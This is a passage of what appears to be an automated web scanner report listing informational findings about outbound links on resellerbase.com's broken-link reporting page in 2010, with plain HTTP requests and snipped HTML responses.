<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://af.NudistFriends.com/i/af6025460"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.41. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/5/myresellerpanel-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.myresellerpanel.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.42. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=32 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.6-chats.com/ELT"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.43. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=46 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/hubshout-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://hubshout.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.44. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=40 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/videosecrets-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="https://secure.videosecrets.com/signup.php?mp_referrer=k2ke"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.45. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=4 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/4/reseller-targetdomain-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://reseller.targetdomain.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.46. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=44 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/44/white-label-seo-resellers-search-engine-optimisation.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10098

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.micrositez.co.uk/white-label-seo-reseller-seo.html"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.47. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=35 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/35/awempire-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10052

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.awempire.com/ws/referral_rs=reseller/wsmain2.php"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.48. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=33 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10012

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.love-money.de/?id=26660"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.49. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=29 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/mediaplazza-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.mediaplazza.com/sysMaster.php?a=movil24"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.50. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=14 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/14/datingrev-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.datingrev.com/cgi/go.cgi?where=0815"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.51. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=28 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9977

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.nicline.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.52. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=31 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10024

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.camsense.com/link.html?ref=1399934"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.53. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=19 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/dating-central-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10108

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.dating-central.com/corporate/register/signup.asp?RID=655&ReferrerID=23939"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.54. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=11 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/11/how-to-win-with-online-reseller-products.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10026

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.reseller-products.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.55. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=45 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/45/dograecorp.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 9982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.dograecorp.com"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.56. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=37 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/37/neondollars-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.neondollars.com/track/harrye:wmref:neondollars/"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.57. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=13 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10101

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://secure.hostgator.com/cgi-bin/affiliates/clickthru.cgi?id=RB0815-resellerbase"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.58. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /bad_link.php?id=20 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/20/ian-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:07:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10027

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Report Broken Link</
...[SNIP]...
<td><a href="http://www.ian.com/ian/signup/home.jsp?cid=104772"><b>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
&nbsp;
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.59. http://www.resellerbase.com/bad_link.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /bad_link.php

Issue detail

The page was loaded from a URL containing a query string (see the request below). The response contains links to other domains; see the href values in the response excerpt below.

Request

GET /bad_link.php?id=12 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/fatcow-com.html
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
